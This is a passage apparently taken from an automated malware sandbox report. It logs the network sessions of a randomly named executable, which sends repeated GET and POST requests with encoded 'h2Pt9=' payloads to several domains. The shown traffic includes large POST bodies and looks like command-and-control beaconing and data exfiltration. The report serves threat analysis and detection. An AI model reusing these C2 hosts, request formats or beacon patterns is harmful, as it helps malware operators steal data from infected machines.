                                  Data Raw: 68 32 50 74 39 3d 44 76 72 2b 4f 48 70 57 51 62 73 38 36 42 34 79 73 33 4c 43 39 2f 5a 43 50 33 55 35 36 76 39 4f 56 71 77 64 43 67 4f 74 74 4c 79 69 67 70 77 38 4f 56 73 6c 75 48 7a 56 57 39 57 43 41 70 6a 61 4e 41 64 6b 50 35 2b 4f 55 4a 52 35 79 62 2b 76 58 52 6c 5a 4b 36 6f 66 59 72 70 58 6d 76 4f 48 78 30 67 72 76 69 63 48 75 51 41 59 63 78 77 6f 7a 63 62 66 6f 74 51 65 50 58 6f 79 58 71 48 62 79 79 6b 61 64 79 6c 71 4e 6f 5a 34 68 63 31 35 32 48 6b 71 54 31 6a 57 78 47 6d 51 58 4b 37 6a 48 4f 6e 35 58 73 54 6f 72 41 54 6c 56 51 6a 7a 5a 71 41 66 53 2f 6c 45 69 68 4f 77 47 51 56 72 76 41 31 47 47 47 42 46 75 5a 72 41 73 53 61 67 77 65 5a 6f 4f 51 55 51 4d 4d 32 70 71 68 38 35 62 45 30 37 41 46 44 7a 77 49 64 4e 6c 55 77 47 48 48 6e 31 74 4f 4c 49 71 77 7a 65 2b 32 77 6b 65 7a 61 35 4c 35 43 48 4c 56 74 73 44 5a 4c 51 68 77 73 59 4e 2b 37 32 38 65 38 79 6f 6a 6c 56 35 52 45 6d 4d 6d 4d 31 43 7a 59 78 4d 77 72 69 54 2b 65 47 56 79 69 50 76 7a 50 49 69 4f 48 71 52 55 30 62 52 35 77 76 6c 4a 41 75 [TRUNCATED]
                                  Data Ascii: h2Pt9=Dvr+OHpWQbs86B4ys3LC9/ZCP3U56v9OVqwdCgOttLyigpw8OVsluHzVW9WCApjaNAdkP5+OUJR5yb+vXRlZK6ofYrpXmvOHx0grvicHuQAYcxwozcbfotQePXoyXqHbyykadylqNoZ4hc152HkqT1jWxGmQXK7jHOn5XsTorATlVQjzZqAfS/lEihOwGQVrvA1GGGBFuZrAsSagweZoOQUQMM2pqh85bE07AFDzwIdNlUwGHHn1tOLIqwze+2wkeza5L5CHLVtsDZLQhwsYN+728e8yojlV5REmMmM1CzYxMwriT+eGVyiPvzPIiOHqRU0bR5wvlJAu0vWRbfYfWY5Wsg5LrGhj/iLI0e3itSf2W4ez7Xl2kI0M2Qjh8dXMErgMQsamLoJ/I/8jiHOZiyOvD2rPlMsOTU/U5LFxyVUHfZwbhVBnSSst3HULQ5fD7FG6EPIXTZREfV575tshlv3qGzFKbKtCtGbAR1GYeIKkgvWUJ2Mjegzmcc18mkDcy1ktjn7puw8+eQwQqksYU21lLAKZikHw3NhVYXnLN7QN3+NL4QjNXI4bSXAvFxLW/tKCqz5q3irJk0PyoQu5ZE5MxAg3zmr5gw259kqoIII7+aY3/dtU2ak4E0Q+aTD4huvWg1Pw9QHwP8MXmQmykLLb4q/HcwwH48D+v0kGK5keXqTh2TOZyp0NBEZbnr95xKukRKtin/y1R67ZOr7RBWWD8DoaCIBPaHJafR8yoaNMPJUup5Ze/cmsOGsTcbmXhu6scqfhKReGtwbq7rFqR3sepf4ObKRo0RzNJoV8YnnaJOF1UjjT4Lo2J8K74zHzUGrHzuseAHq2n7aGTFvWhjmDdhHRgWLlpJlANYnyylBb78nY1gVquf3/exV7mOoa7ycp6dJEQvGPmUKcu7ZHMY2nvb/A3wmxot9mmXDKwKnpLyVhmqu8LkPf3fVG9aXEQshoXXqSl4W54LtbL1kU+QkC/Egiv8H9Yblt4S/mYJYGKE [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.4558133.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:20.808948994 CEST518OUTGET /30jd/?h2Pt9=OtDeNxpSfKodwTIu4nnA+ux6enUP6PpldrB0PRj1l4+Fh7wLXn4C+U6iIOCzG6zWS3UsP4q8AKFA04SbUzJ+fbd5Tc1EuJbYoHYXowwdmRoBcyVO6/LzqMo=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.whats-in-the-box.org
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:30:21.255518913 CEST396INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 16 Sep 2024 07:30:21 GMT
                                  Content-Type: text/html
                                  Content-Length: 256
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 68 32 50 74 39 3d 4f 74 44 65 4e 78 70 53 66 4b 6f 64 77 54 49 75 34 6e 6e 41 2b 75 78 36 65 6e 55 50 36 50 70 6c 64 72 42 30 50 52 6a 31 6c 34 2b 46 68 37 77 4c 58 6e 34 43 2b 55 36 69 49 4f 43 7a 47 36 7a 57 53 33 55 73 50 34 71 38 41 4b 46 41 30 34 53 62 55 7a 4a 2b 66 62 64 35 54 63 31 45 75 4a 62 59 6f 48 59 58 6f 77 77 64 6d 52 6f 42 63 79 56 4f 36 2f 4c 7a 71 4d 6f 3d 26 34 52 4c 68 73 3d 37 42 4a 4c 4d 34 65 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?h2Pt9=OtDeNxpSfKodwTIu4nnA+ux6enUP6PpldrB0PRj1l4+Fh7wLXn4C+U6iIOCzG6zWS3UsP4q8AKFA04SbUzJ+fbd5Tc1EuJbYoHYXowwdmRoBcyVO6/LzqMo=&4RLhs=7BJLM4eH"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.4558143.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:26.320586920 CEST783OUTPOST /4hiy/ HTTP/1.1
                                  Host: www.weatherbook.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.weatherbook.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.weatherbook.live/4hiy/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 38 35 57 57 4c 4a 50 42 72 58 69 36 45 70 54 58 30 7a 64 54 67 35 56 50 39 6b 55 75 37 51 77 35 59 39 4c 6d 6c 76 49 64 55 76 43 6f 33 55 57 56 50 77 73 4e 6b 61 44 54 52 70 34 6e 59 58 4b 72 45 75 71 38 49 41 55 31 48 65 2b 2f 70 44 57 78 33 51 43 41 41 72 6a 2f 45 44 2b 6a 37 4c 4d 46 79 59 47 51 2f 59 30 41 35 4a 57 73 48 6e 2b 48 48 4f 6d 71 42 62 47 74 49 49 76 63 4e 55 56 53 4a 76 39 72 33 39 7a 74 76 30 71 45 6c 43 78 32 74 6e 30 35 35 61 6a 38 56 5a 78 32 7a 47 71 56 59 4a 76 69 42 49 65 6f 59 4e 61 73 77 49 6c 2b 41 4e 72 42 5a 38 53 68 6e 68 45 65 6d 33 76 6f 6b 77 3d 3d
                                  Data Ascii: h2Pt9=85WWLJPBrXi6EpTX0zdTg5VP9kUu7Qw5Y9LmlvIdUvCo3UWVPwsNkaDTRp4nYXKrEuq8IAU1He+/pDWx3QCAArj/ED+j7LMFyYGQ/Y0A5JWsHn+HHOmqBbGtIIvcNUVSJv9r39ztv0qElCx2tn055aj8VZx2zGqVYJviBIeoYNaswIl+ANrBZ8ShnhEem3vokw==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.4558153.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:28.874934912 CEST803OUTPOST /4hiy/ HTTP/1.1
                                  Host: www.weatherbook.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.weatherbook.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.weatherbook.live/4hiy/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 38 35 57 57 4c 4a 50 42 72 58 69 36 46 4a 44 58 7a 51 31 54 6c 5a 56 4d 7a 45 55 75 69 41 77 39 59 39 48 6d 6c 72 34 4e 55 38 71 6f 30 78 53 56 4f 78 73 4e 6e 61 44 54 4a 5a 34 6d 48 48 4c 6e 45 75 33 63 49 42 6f 31 48 61 57 2f 70 44 6d 78 30 68 43 44 47 37 6a 35 4f 54 2b 6c 6b 62 4d 46 79 59 47 51 2f 59 67 36 35 4a 65 73 48 55 57 48 45 72 61 74 43 62 47 75 42 6f 76 63 61 45 56 57 4a 76 38 4d 33 35 7a 58 76 78 75 45 6c 41 70 32 71 31 51 34 67 71 6a 36 4c 70 77 45 39 33 48 37 55 72 7a 7a 42 72 53 4b 47 2f 53 37 78 4f 30 6b 52 38 4b 57 4c 38 32 53 36 6d 4e 71 72 30 53 68 2f 38 6b 33 74 45 4d 47 58 30 65 79 74 73 74 6d 67 32 48 31 53 78 67 3d
                                  Data Ascii: h2Pt9=85WWLJPBrXi6FJDXzQ1TlZVMzEUuiAw9Y9Hmlr4NU8qo0xSVOxsNnaDTJZ4mHHLnEu3cIBo1HaW/pDmx0hCDG7j5OT+lkbMFyYGQ/Yg65JesHUWHEratCbGuBovcaEVWJv8M35zXvxuElAp2q1Q4gqj6LpwE93H7UrzzBrSKG/S7xO0kR8KWL82S6mNqr0Sh/8k3tEMGX0eytstmg2H1Sxg=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.4558163.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:31.416431904 CEST10885OUTPOST /4hiy/ HTTP/1.1
                                  Host: www.weatherbook.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.weatherbook.live
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.weatherbook.live/4hiy/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 38 35 57 57 4c 4a 50 42 72 58 69 36 46 4a 44 58 7a 51 31 54 6c 5a 56 4d 7a 45 55 75 69 41 77 39 59 39 48 6d 6c 72 34 4e 55 38 79 6f 30 48 75 56 50 53 30 4e 6d 61 44 54 58 70 34 6a 48 48 4c 71 45 75 2f 51 49 42 6c 41 48 59 75 2f 76 69 47 78 2f 31 32 44 49 37 6a 35 47 7a 2b 6b 37 4c 4d 51 79 59 57 55 2f 59 77 36 35 4a 65 73 48 52 53 48 54 75 6d 74 4f 37 47 74 49 49 76 51 4e 55 56 2b 4a 76 30 32 33 35 6e 48 76 43 57 45 6c 6a 52 32 72 47 30 34 2f 61 6a 34 4b 70 77 63 39 33 4c 34 55 72 2b 66 42 6f 4f 77 47 39 4f 37 78 2f 42 53 4b 4d 57 32 5a 4f 32 33 6d 45 55 4d 73 54 71 78 6e 2b 42 4c 68 78 6f 4d 46 51 47 62 6d 50 63 45 38 7a 72 4a 42 6c 53 55 75 4d 38 64 63 78 48 49 57 51 4d 49 50 54 67 45 4b 35 52 6d 69 6b 6e 48 68 6a 72 61 72 63 50 4b 6c 6c 47 49 54 64 74 50 48 47 46 4a 72 73 6c 56 43 73 30 44 59 44 37 56 39 38 64 68 72 45 33 39 63 63 48 46 7a 70 4d 69 32 7a 6a 78 71 66 50 4b 4c 72 53 51 6a 50 74 38 36 2b 41 46 31 54 68 77 6a 4d 6c 4c 70 35 61 44 58 72 54 6a 70 55 41 38 69 4e 6a 48 [TRUNCATED]
                                  Data Ascii: h2Pt9=85WWLJPBrXi6FJDXzQ1TlZVMzEUuiAw9Y9Hmlr4NU8yo0HuVPS0NmaDTXp4jHHLqEu/QIBlAHYu/viGx/12DI7j5Gz+k7LMQyYWU/Yw65JesHRSHTumtO7GtIIvQNUV+Jv0235nHvCWEljR2rG04/aj4Kpwc93L4Ur+fBoOwG9O7x/BSKMW2ZO23mEUMsTqxn+BLhxoMFQGbmPcE8zrJBlSUuM8dcxHIWQMIPTgEK5RmiknHhjrarcPKllGITdtPHGFJrslVCs0DYD7V98dhrE39ccHFzpMi2zjxqfPKLrSQjPt86+AF1ThwjMlLp5aDXrTjpUA8iNjHZ1duE0li5ar1GXUTOaaWFe+vkgrGsRWD9R3Pd3wr2UoaPX+7cJA5oy7CLBABNOVmtbIzy1is3T770DVirt85dB7q1iJjUTFe4HMkyf7upG/XJ5db9Wtopr9BJS/ezEK54ySzvBGwEQxnKHpIxIXjDbySblChOuR7Nmlpe043oSTJwSEcXzv+oCfAlH/kTTM+BfY+4QwOBE/euCJQ9C3IMCkcGiItgdHJYhiatyrCcwce/Ao/iZbtEAQZHG4mOto7VwnUeS1b6IQNLsaCl6bdm6Vl9lRo0+7Y/N/8a3pcpHvBZl9WPky8ILKHLQMw1haKFEaUZXdmTF0aQ9rY8fd3XFrtx+RwlzosjBFFPmGhe/Nj47ICYbQiG5HcjGZDnxud+daEsgPeC6GlsgfcMPDhyEdUWOvFXWwLMHrzVhFogLvOlkctQnTKsbzksVCBSS1BqWqjdwLgyVifKXpGnGZcP2ViRm0Jch+P+Yw6EvSXH+0Phahf6uEZVQACoSla7nK7BYdDyI8Px0V5hBs+96XRqNfsw82ou7jkvDHXulgcGju8Gw2RimdbgRiChVNvYOr1oyomHflS54rdIMowVsXWsWG/9TE/NKkuDNpb4P3LJ7KtLdybAaAaKdQLbW0rYpNc7j0ah54O5Dww6uCH62yoZW2/8466Mls6gI [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.4558173.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:34.348057985 CEST514OUTGET /4hiy/?h2Pt9=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.weatherbook.live
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:30:41.867685080 CEST396INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 16 Sep 2024 07:30:41 GMT
                                  Content-Type: text/html
                                  Content-Length: 256
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 68 32 50 74 39 3d 78 37 2b 32 49 38 53 47 73 55 65 63 43 4d 69 53 6a 54 46 62 6c 35 6c 70 36 48 64 63 2b 32 77 31 56 74 69 62 73 4a 74 2f 4d 73 79 4c 33 6b 43 55 61 42 49 52 37 2f 53 47 4a 36 45 6a 52 6b 48 30 4c 4d 32 6b 4b 51 4d 52 4d 71 2f 4f 6e 77 4b 72 38 67 57 69 58 34 72 47 49 42 65 57 76 6f 45 43 72 5a 6d 55 38 36 73 61 75 5a 66 74 42 57 69 63 54 6f 4f 63 4c 5a 6b 3d 26 34 52 4c 68 73 3d 37 42 4a 4c 4d 34 65 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?h2Pt9=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&4RLhs=7BJLM4eH"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.4558183.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:46.950253010 CEST789OUTPOST /jvjp/ HTTP/1.1
                                  Host: www.crowsecurity.cloud
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.crowsecurity.cloud
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.crowsecurity.cloud/jvjp/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 31 5a 52 73 70 62 35 2f 69 51 77 38 53 44 69 4b 54 65 59 64 52 46 6d 55 45 54 39 43 57 4d 35 6d 54 36 43 52 59 49 57 2b 6e 67 70 58 45 68 2b 61 69 76 64 66 73 67 77 44 47 6f 5a 64 33 4c 54 78 2f 73 61 2b 6a 42 51 36 50 6e 38 56 6e 57 78 50 39 44 78 6c 46 66 64 47 4e 68 4d 4b 76 6e 74 52 69 45 2b 35 64 78 4f 69 70 64 66 6e 6a 4d 59 6d 6a 62 65 6e 56 69 70 66 73 6e 33 50 75 68 7a 2f 54 44 6e 38 6c 4b 57 53 78 62 4f 66 53 6a 44 32 31 4b 2f 51 74 6b 79 53 55 2f 75 46 62 6a 46 35 33 6a 65 30 31 65 66 70 71 48 72 54 50 38 59 6d 79 69 51 73 54 75 36 63 4b 66 34 46 72 64 31 2b 6c 51 3d 3d
                                  Data Ascii: h2Pt9=1ZRspb5/iQw8SDiKTeYdRFmUET9CWM5mT6CRYIW+ngpXEh+aivdfsgwDGoZd3LTx/sa+jBQ6Pn8VnWxP9DxlFfdGNhMKvntRiE+5dxOipdfnjMYmjbenVipfsn3Puhz/TDn8lKWSxbOfSjD21K/QtkySU/uFbjF53je01efpqHrTP8YmyiQsTu6cKf4Frd1+lQ==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.4558193.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:49.507642031 CEST809OUTPOST /jvjp/ HTTP/1.1
                                  Host: www.crowsecurity.cloud
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.crowsecurity.cloud
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.crowsecurity.cloud/jvjp/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 31 5a 52 73 70 62 35 2f 69 51 77 38 54 69 79 4b 56 35 45 64 47 31 6d 54 4b 7a 39 43 59 73 35 69 54 36 4f 52 59 4a 53 75 6d 57 78 58 64 45 43 61 74 4c 78 66 76 67 77 44 4f 49 5a 59 34 72 54 76 2f 73 65 32 6a 46 59 36 50 6e 6f 56 6e 53 31 50 2b 30 74 69 44 66 64 59 59 78 4d 49 72 6e 74 52 69 45 2b 35 64 78 71 49 70 64 48 6e 69 39 49 6d 79 4b 65 6b 63 43 70 63 72 6e 33 50 71 68 7a 37 54 44 6e 4b 6c 4c 4b 38 78 59 6d 66 53 68 4c 32 31 62 2f 58 32 55 79 63 51 2f 76 49 4e 6a 34 68 78 43 76 6d 79 49 50 59 31 30 4b 78 4f 36 4a 38 6a 54 78 37 42 75 65 76 58 59 78 78 6d 65 49 33 2b 51 67 4f 67 6a 43 7a 46 6a 58 59 70 32 6c 41 68 39 4c 48 44 33 6b 3d
                                  Data Ascii: h2Pt9=1ZRspb5/iQw8TiyKV5EdG1mTKz9CYs5iT6ORYJSumWxXdECatLxfvgwDOIZY4rTv/se2jFY6PnoVnS1P+0tiDfdYYxMIrntRiE+5dxqIpdHni9ImyKekcCpcrn3Pqhz7TDnKlLK8xYmfShL21b/X2UycQ/vINj4hxCvmyIPY10KxO6J8jTx7BuevXYxxmeI3+QgOgjCzFjXYp2lAh9LHD3k=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.4558203.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:52.059668064 CEST10891OUTPOST /jvjp/ HTTP/1.1
                                  Host: www.crowsecurity.cloud
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.crowsecurity.cloud
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.crowsecurity.cloud/jvjp/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 31 5a 52 73 70 62 35 2f 69 51 77 38 54 69 79 4b 56 35 45 64 47 31 6d 54 4b 7a 39 43 59 73 35 69 54 36 4f 52 59 4a 53 75 6d 57 4a 58 42 6d 61 61 73 73 6c 66 75 67 77 44 4e 49 5a 5a 34 72 53 71 2f 6f 36 79 6a 46 63 4d 50 6c 51 56 6d 78 39 50 2f 47 46 69 57 76 64 59 41 42 4d 4c 76 6e 73 4a 69 41 69 39 64 78 61 49 70 64 48 6e 69 2b 41 6d 69 72 65 6b 51 69 70 66 73 6e 33 44 75 68 79 6d 54 44 50 61 6c 4c 65 43 78 6f 47 66 53 42 62 32 79 74 44 58 72 6b 79 4a 64 66 75 62 4e 6a 30 41 78 47 33 55 79 49 54 2b 31 7a 36 78 50 65 49 33 2b 41 46 53 63 74 75 4c 4d 50 64 4f 76 4f 73 74 36 78 67 6d 74 44 33 7a 65 43 75 31 69 47 63 57 35 38 44 36 55 77 63 45 6c 54 64 74 4d 57 61 32 56 70 73 53 6f 4c 35 4d 6b 4a 6e 55 4e 35 36 78 61 53 37 2b 7a 44 31 37 78 4b 2f 74 4b 57 61 7a 46 4e 74 57 50 51 69 48 6d 39 49 69 42 4d 69 52 4d 56 50 47 6d 53 56 50 4f 32 7a 65 36 55 71 55 69 43 66 33 66 49 6a 39 33 76 56 73 48 73 4b 33 69 31 6a 4a 31 52 2b 51 48 74 72 69 37 4f 57 77 30 59 38 6f 36 4a 6f 6b 30 50 6c 36 [TRUNCATED]
                                  Data Ascii: h2Pt9=1ZRspb5/iQw8TiyKV5EdG1mTKz9CYs5iT6ORYJSumWJXBmaasslfugwDNIZZ4rSq/o6yjFcMPlQVmx9P/GFiWvdYABMLvnsJiAi9dxaIpdHni+AmirekQipfsn3DuhymTDPalLeCxoGfSBb2ytDXrkyJdfubNj0AxG3UyIT+1z6xPeI3+AFSctuLMPdOvOst6xgmtD3zeCu1iGcW58D6UwcElTdtMWa2VpsSoL5MkJnUN56xaS7+zD17xK/tKWazFNtWPQiHm9IiBMiRMVPGmSVPO2ze6UqUiCf3fIj93vVsHsK3i1jJ1R+QHtri7OWw0Y8o6Jok0Pl6TVDOVtF5CjUi1SEsUAklonpuOLsJ2ByS0Owe6QSkPHvP9vr7MfNFLESIpN096341tPedALlFvgPygiVg2me6u+Bv3V+/62B+WVLcSLVZUjgVp55AofqKrH8f8/RLnX2TnAGTI/BzR3D7jMTz0z9IcLqFcC7g11lSsa4eyhx2vE31H8OdLBsYlHuoaQFD8sJ+zK8Ls3RszNlpdQglnLy448WXFoigLRNP2WypyekLy+fhV1YQlfYW0f2MeWXJkCE/NBTmGJ2vmGwoOKhiiVtxvFST3rVG5iIh213M2cKYROZiyvesuWGQePKWxl3Hi1O7U0ss45DxVlQSw/ygFifTOy0UFdsneGUCOQJ6QqP/rcILonS+1RJxvvc6YSIoyhVdYDh5q3orAKDm6sArme1YphzvRg72amJYTsNVPN0LRjy1mguRZlG378GcOfbS4Wi8gfbSp6TBxmvQi2/UR+4qx1fgHYAk6MYUTAmsSOsw3PdEeM1cW7lBsz5fhlN6HTygpC44Q5kUxYFGJBcAMLNS+5JPUNiiGYHuDyJCXEZUg11cdaj3Z5qaRfmBIwTg7Dijvoo5rf7zZuvYfSOBha06QPakRfOZMToesq1GJKHaAZjwIwV/O45CuH3seJuFk39gFmTKv5HxqXSZ5yWrTFlFIX47OXUtP4vAPe [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.4558213.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:30:54.611202002 CEST516OUTGET /jvjp/?h2Pt9=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.crowsecurity.cloud
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:30:57.993134022 CEST396INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 16 Sep 2024 07:30:57 GMT
                                  Content-Type: text/html
                                  Content-Length: 256
                                  Connection: close
